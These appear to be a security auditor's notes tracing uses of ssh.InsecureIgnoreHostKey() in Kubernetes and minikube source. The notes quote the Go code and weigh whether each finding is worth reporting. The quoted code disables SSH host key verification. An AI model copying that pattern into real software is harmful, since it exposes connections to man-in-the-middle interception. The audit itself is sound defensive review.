func (c *SSHTunneler) Run(getAddresses AddressFunc) {
// (...)
c.tunnels = ssh.NewSSHTunnelList(c.SSHUser, c.SSHKeyfile, c.HealthCheckURL, c.stopChan)
Run is called in src/kubernetes-1.13.4/pkg/master/master.go:385:

func (m *Master) installTunneler(nodeTunneler tunneler.Tunneler, nodeClient corev1client.NodeInterface) {
nodeTunneler.Run(nodeAddressProvider{nodeClient}.externalAddresses)
src/kubernetes-1.13.4/pkg/master/master.go:294:

// New returns a new instance of Master from the given config.
// Certain config fields will be set to a default value if unset.
// Certain config fields must be specified, including:
// KubeletClientConfig
func (c completedConfig) New(delegationTarget genericapiserver.DelegationTarget) (*Master, error) {
// (...)
m.InstallAPIs(c.ExtraConfig.APIResourceConfigSource, c.GenericConfig.RESTOptionsGetter, restStorageProviders...)
if c.ExtraConfig.Tunneler != nil {
m.installTunneler(c.ExtraConfig.Tunneler, corev1client.NewForConfigOrDie(c.GenericConfig.LoopbackClientConfig).Nodes())
}
m.GenericAPIServer.AddPostStartHookOrDie("ca-registration", c.ExtraConfig.ClientCARegistrationHook.PostStartHook)
return m, nil
}
I think this is called for the master apiserver, and we may specify SSH tunneling in the config. This must be confirmed, though.
runSSHCommand, called by RunSSHCommand. This code is called only by test/e2e/framework/util.go, so I believe it is only used for testing - we probably don't want to report this one.

// Internal implementation of runSSHCommand, for testing
func runSSHCommand(dialer sshDialer, cmd, user, host string, signer ssh.Signer, retry bool) (string, string, int, error) {
if user == "" {
user = os.Getenv("USER")
}
// Setup the config, dial the server, and open a session.
config := &ssh.ClientConfig{
User: user,
Auth: []ssh.AuthMethod{ssh.PublicKeys(signer)},
HostKeyCallback: ssh.InsecureIgnoreHostKey(),
}
TLDR: It seems this is used when the ssh binary is not found and the default client type is Native - in src/minikube-0.35.0/vendor/github.com/docker/machine/libmachine/ssh/client.go:131:
func NewNativeConfig(user string, auth *Auth) (ssh.ClientConfig, error) {
var (
authMethods []ssh.AuthMethod
)
for _, k := range auth.Keys {
key, err := ioutil.ReadFile(k)
if err != nil {
return ssh.ClientConfig{}, err
}
privateKey, err := ssh.ParsePrivateKey(key)
if err != nil {
return ssh.ClientConfig{}, err
}
authMethods = append(authMethods, ssh.PublicKeys(privateKey))
}
for _, p := range auth.Passwords {
authMethods = append(authMethods, ssh.Password(p))
}
return ssh.ClientConfig{
User: user,
Auth: authMethods,
HostKeyCallback: ssh.InsecureIgnoreHostKey(),
}, nil
}
Anyway, since Minikube is for local clusters, I don't think this is an important issue.